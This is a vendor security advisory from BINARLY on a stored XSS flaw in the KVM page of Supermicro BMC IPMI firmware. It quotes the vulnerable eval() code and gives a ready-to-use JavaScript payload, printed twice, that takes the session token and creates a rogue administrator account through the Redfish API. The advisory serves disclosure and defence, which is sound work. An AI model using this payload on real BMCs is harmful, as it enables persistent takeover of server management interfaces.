BRLY-2023-023

Stored cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the `man_ikvm_html5_bootstrap` webpage using `lang` local storage item

Public Disclosure Date: Sep 16, 2024

CVE ID

BRLY-2023-023

Vendors Affected

Supermicro

Products Affected

H12SSL-C/H12SSL-CT/H12SSL-i/H12SSL-NT

Summary

BINARLY team has discovered a stored DOM-based cross-site scripting (XSS) vulnerability in the man_ikvm_html5_bootstrap webpage that uses lang local storage item, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges.

Potential Impact

An attacker could exploit this vulnerability to create an account with administrative privileges to the web server component of BMC IPMI software. Such account provides full access to all IPMI feautures. It also allows exploitation of vulnerabilities that require authentication. Successful exploitation of this vulnerability provides an attacker with persistence, allowing malicious code to be executed until the victim takes remedial actions.

Vulnerability Information

BINARLY internal vulnerability identifier: BRLY-2023-023
Supermicro advisory: https://www.supermicro.com/en/support/security_BMC_IPMI_Apr_2024
BINARLY calculated CVSS v3.1: 8.6 High AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

01Affected Supermicro firmwares

02Vulnerability description

03Steps for exploitation

04How to fix it

05Disclosure timeline

06Acknowledgements

Affected Supermicro firmwares

Device	Version	SHA256
H12SSL-C/H12SSL-CT/H12SSL-i/H12SSL-NT	01.01.10	66d376c40641bfdb9196244973fdf9d297c26f7fa48981a625ce7800448fafd9

Vulnerability description

man_ikvm_html5_bootstrap webserver HTML page passes the value of lang local storage item to the eval() JavaScript function without any sanitization:

man_ikvm_html5_bootstrap:

var sel = WebUtil.readSetting("lang","en");

translator = jQuery('body').translate ({
    lang: sel,
    t: eval("kvmdict_" + sel)
});

As a result, arbitrary JavaScript code can be injected into webpages, which will be executed on behalf of the authenticated user.

Steps for exploitation

The first step to exploit this vulnerability is to poison the user's lang local storage item. This can be achieved using another vulnerability in the web server (with XSS, HTTP header injection, etc.), as well as through exploitation of other system components, for example, with a malware.

To create an administrator account with username user and password fLbYsEHqhGYp9pgK an attacker can poison the lang local storage item of an authenticated user session with administrative privileges with the following payload:

en + fetch("/redfish/v1/AccountService/Accounts",{method:"POST",headers:{"X-Auth-Token":sessionStorage.getItem("_x_auth")},body:JSON.stringify({"UserName":"user","Password":"fLbYsEHqhGYp9pgK","RoleId":"Administrator","Enabled":true,"AccountTypes":["Redfish"]})})

This payload first obtains the user's valid token and then uses it to make a POST request in order to create a user with administrative privileges and credentials defined by the attacker.

NOTE: The payload will be executed every time the victim visits vulnerable pages while the lang local storage item value is poisoned, even after logging in again, making this attack persistent. To terminate the exploitation, additional steps are required to clear the element local storage value.

How to fix it

Ideally, user controlled inputs should not be passed to dangerous JavaScript functions such as eval(). If it is not possible in such case, the lang local storage item value must be checked against a whitelist of allowed values.

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Disclosure Activity	Date (YYYY-mm-dd)
Supermicro PSIRT is notified	2023-12-22
Supermicro PSIRT confirmed reported issue	2024-02-13
Supermicro public disclosure date	2024-04-02
BINARLY public disclosure date	2024-09-16

Acknowledgements

BINARLY team

See if you are impacted now with our Firmware Vulnerability Scanner

Find Vulnerabilities, Generate SBOMs & CBOMs

Scan Now

Potential Impact

Vulnerability Information

BINARLY internal vulnerability identifier: BRLY-2023-023
Supermicro advisory: https://www.supermicro.com/en/support/security_BMC_IPMI_Apr_2024
BINARLY calculated CVSS v3.1: 8.6 High AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Device

Version

SHA256

H12SSL-C/H12SSL-CT/H12SSL-i/H12SSL-NT

01.01.10

66d376c40641bfdb9196244973fdf9d297c26f7fa48981a625ce7800448fafd9

en + fetch("/redfish/v1/AccountService/Accounts",{method:"POST",headers:{"X-Auth-Token":sessionStorage.getItem("_x_auth")},body:JSON.stringify({"UserName":"user","Password":"fLbYsEHqhGYp9pgK","RoleId":"Administrator","Enabled":true,"AccountTypes":["Redfish"]})})

Disclosure Activity

Date (YYYY-mm-dd)

Supermicro PSIRT is notified

2023-12-22

Supermicro PSIRT confirmed reported issue

2024-02-13

Supermicro public disclosure date

2024-04-02

BINARLY public disclosure date

2024-09-16

Potential Impact

Image preview

Vulnerability Information

Image preview

Affected Supermicro firmwares

Image preview

Vulnerability description

Image preview

Steps for exploitation

Image preview

How to fix it

Image preview

Disclosure timeline

Image preview

Acknowledgements

Image preview

See if you are impacted now with our Firmware Vulnerability Scanner

Potential Impact

Image preview

Vulnerability Information

Image preview

Affected Supermicro firmwares

Image preview

Vulnerability description

Image preview

Steps for exploitation

Image preview

How to fix it

Image preview

Disclosure timeline

Image preview

Acknowledgements

Image preview

See if you are impacted now with our Firmware Vulnerability Scanner